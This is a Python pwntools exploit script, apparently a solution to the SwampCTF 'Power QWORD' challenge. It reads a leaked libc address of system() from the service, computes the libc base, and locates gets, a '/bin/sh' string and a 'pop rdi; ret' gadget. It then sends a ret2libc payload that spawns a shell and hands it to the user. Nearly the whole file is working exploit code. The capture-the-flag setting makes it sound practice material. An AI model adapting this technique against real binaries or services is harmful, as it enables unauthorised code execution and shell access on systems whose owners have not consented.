Client for SwampCTF's Power QWORD challenge
#!/usr/bin/env python
import os
from pwn import *
from pwnlib.util.safeeval import const
# Challenge-provided libc. Its symbol table and file contents are searched in
# main() to turn the one address the service leaks into the other addresses
# the payload needs, so this file must match the libc the service runs.
libc = ELF('./libc.so.6')
# When gdb is attached (DEBUG mode below), pwntools opens it in a tmux split.
context(terminal = ['tmux', 'splitw'])
# 64-bit target: p64() and asm() in main() depend on this setting.
context.bits = 64
# pwntools `args` exposes KEY / KEY=value words given on the command line.
# With DEBUG set, drive a local copy of the binary under gdb; otherwise talk
# to the remote service. Either way `r` is the connection main() uses.
if (args.DEBUG):
    r = process('power')
    gdb.attach(r, 'c')  # 'c': continue as soon as the debugger is attached
else:
    r = remote('chal1.swampctf.com', 1999)
def main():
    """Drive one session against the challenge service over `r`.

    The order of the recv/send calls is dictated by the service's prompts:
    answer the first prompt, read the bracketed value the service leaks,
    derive the remaining libc addresses from it, send a four-QWORD payload,
    then hand the connection to the user.  Everything read from `r` is
    untrusted remote output; the leaked text is parsed with pwnlib's
    `safeeval.const`, never `eval`.

    Python 2 script: uses `print` statements and the generator `.next()`
    method.  Relies on the module-level `r` and `libc`.
    """
    # Read through the first ': ' prompt (echoed for the operator) and answer it.
    print(r.recvuntil(': '))
    r.send('yes\n')
    # Skip ahead to the leak; the bracketed text that follows is the value
    # the service hands out. Strip the surrounding spaces and closing ']'.
    print r.recvuntil('the mage hands you')
    leak = r.recvuntil(']').lstrip(' ').rstrip(']')
    print r.recvuntil('QWord:')
    # Parse the leaked text as a Python constant (safe evaluation of remote
    # data). The value is treated as the runtime address of libc's system().
    system = const(leak)
    # libc base = leaked runtime address - that symbol's offset within the file.
    base = system - libc.symbols['__libc_system']
    # The other addresses are file offsets rebased onto the computed base:
    # gets(), a '/bin/sh' string, and a 'pop rdi; ret' gadget, the latter two
    # located by searching libc's contents (.next() is Python 2's generator
    # method; search() yields offsets).
    gets = base + libc.symbols['_IO_gets']
    binsh = base + libc.search('/bin/sh').next()
    pop_rdi = base + libc.search(asm('pop rdi; ret;')).next()
    # Diagnostic output so a wrong libc or bad leak is visible before sending.
    print 'base: {}'.format(hex(base))
    print 'pop rdi: {}'.format(hex(pop_rdi))
    print 'system: {}'.format(hex(system))
    print '/bin/sh: {}'.format(hex(binsh))
    # Four little-endian QWORDs (p64 follows context.bits = 64).
    payload = p64(gets) + p64(pop_rdi) + p64(binsh) + p64(system)
    r.sendline(payload)
    # Hand the connection over to the user.
    r.interactive()
# Script entry point. Note that the module-level setup above already opened
# the process or remote connection at import time; only main() is deferred.
if __name__ == "__main__":
    main()